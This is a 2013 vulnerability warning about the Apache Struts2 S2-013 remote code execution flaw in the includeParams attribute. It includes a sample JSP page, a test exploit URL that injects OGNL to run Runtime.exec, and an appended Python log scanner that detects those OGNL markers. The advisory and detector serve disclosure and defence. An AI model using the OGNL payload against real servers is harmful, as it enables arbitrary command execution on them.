Struts2 again hit by an arbitrary code execution vulnerability - Vulnerability warning - 黑吧安全网 (MyHack58)

2013-05-22T00:00:00
ID MYHACK58:62201338890
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-05-22T00:00:00

Description

Summary

A remote code execution vulnerability was recently disclosed in the official Apache Struts2 product, numbered "S2-013". It is currently a 0day: no official fix has been published.

http://struts.apache.org/development/2.x/docs/security-bulletins.html — (announcement)

The official security bulletin gives only the number and a brief description: "A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution".

It does not explain the underlying cause, and no patch has been released.

s.jsp (a minimal page using the affected tag with includeParams="all", so every request parameter is copied into the generated link):

<%@ page language="java" import="java.util.*" pageEncoding="utf-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
<s:a includeParams="all">Click here.</s:a>

Test EXP:

http://admin-pc:8080/Struts2/s.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
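As an added defender-side example (not part of the original warning), the following Python scans web-server access-log lines for the OGNL expression indicators visible in the test URL above, after fully percent-decoding the query string. The log format, the sample lines and the marker list are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# An OGNL expression in a parameter value starts with "${" or "%{".
OGNL_EXPR = re.compile(r"[$%]\{")
# Markers from the S2-013 test URL: MemberAccess tampering and a static call.
OGNL_MARKERS = (
    "#_memberAccess",
    "allowStaticMethodAccess",
    "@java.lang.Runtime@",
    "getRuntime()",
)

def decode_query(url):
    """Return the fully percent-decoded query string of a request URL.
    Decoding repeats until stable so double encoding (e.g. %2524) cannot
    hide the markers."""
    query = urlsplit(url).query
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def find_ognl_injection(url):
    """Return the OGNL markers found in the decoded query (empty if none).
    A bare "${" with no marker is not reported, to limit false positives."""
    q = decode_query(url)
    if not OGNL_EXPR.search(q):
        return []
    return [m for m in OGNL_MARKERS if m in q]

def scan_access_log(lines):
    """Return (line_no, url, markers) for every line whose request URL carries
    OGNL markers. Constructed log format: '<ip> <method> <url> <status>'."""
    hits = []
    for no, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 3:
            continue
        markers = find_ognl_injection(parts[2])
        if markers:
            hits.append((no, parts[2], markers))
    return hits

# Constructed sample log lines (not real traffic); line 2 mirrors the test URL above.
SAMPLE_LOG = [
    "10.0.0.5 GET /Struts2/s.jsp?a=1 200",
    "10.0.0.7 GET /Struts2/s.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')} 200",
    "10.0.0.9 GET /Struts2/s.jsp?q=price%20%24%7B10%7D 200",
]

if __name__ == "__main__":
    for no, url, markers in scan_access_log(SAMPLE_LOG):
        print(f"line {no}: OGNL markers {markers} in {url}")
```

The third sample line decodes to a harmless "${10}" and is deliberately not flagged, so the check requires both the expression delimiter and a known marker.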
